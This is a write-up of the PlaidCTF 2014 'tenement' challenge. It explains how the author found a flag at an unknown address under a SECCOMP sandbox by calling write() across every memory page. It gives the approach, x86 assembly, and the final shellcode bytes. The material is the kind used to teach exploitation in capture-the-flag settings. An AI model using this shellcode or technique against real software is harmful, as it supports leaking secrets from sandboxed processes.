PlaidCTF 2014 tenement

Task : tenement (Pawnable 100pt)

Time Spent : 5~6H

This task opens the flag file and reads the key at a randomly mmaped memory location. 

after that, the server lets us run an arbitrary x86 shellcode. However, before we execute our shellcode, the server sandboxes all the system calls using SECCOMP (prctl). therefore, we can only read/write system calls in our shellcode.

So, if we know the memory location of flag. we can simply execute a shellcode which reads that memory location. However, the problem is that we do not know this address.  So at first, I inspected all the register context and known memory locations, and stack to see if there is any information leak which tells us the location of this flag.  Unfortunately there was any.

After struggling for a while, I found out that write([descriptor], [invalid address], [length]) does not raise segmentation fault, instead it just returns -1.  We know that the flag resides at the page aligned memory address since it is allocated by mmap().  Therefore I realized that I can simply try this in my shellcode.

for( int i=0x1000; i < 0xFFFF0000; i += 0x1000 ){

write( 1, i, 30 );

}

return;

So I wrote a simple x86 shellcode which performs this operation.

push %ebx

movl $0x804a3fc, %ebx

movl $0x1000, %eax

movl %eax, 0x0(%ebx)

pop %ebx

L1:

push $0x30 # size

push %eax # addr

push $0x1

push $0x8048860 # write

pop %eax

call *%eax

# addl $0x0c, %esp 

push %ebx

movl $0x804a3fc, %ebx

movl 0x0(%ebx), %eax

addl $0x1000, %eax

movl %eax, 0x0(%ebx)

pop %ebx

cmp $0xfffff000, %eax

je EXIT

jmp L1

First, I sent this shellcode to my local environment. I was success..! I could read the flag even if its location is random. However when I run the exact same shellcode from server environment, there was no response... I got stuck here for a while.  I turns out that the calling convention of library function was different.  My libc write function used __cdecl, however the server side libc write used __stdcall convention.  After I realized this and changed my shellcode, I got the flag :)

Flag : Wub-a-lubba-dub-dub

Final Exploit. (shellcode)

'\x6a\x20\x68\x10\x88\x04\x08\x58\xff\xd0\x68\x00\x10\x00\x00\x2d\x00\x01\x00\x00\x50\x6a\x01\x68\x60\x88\x04\x08\x58\xff\xd0\xc9\xc3'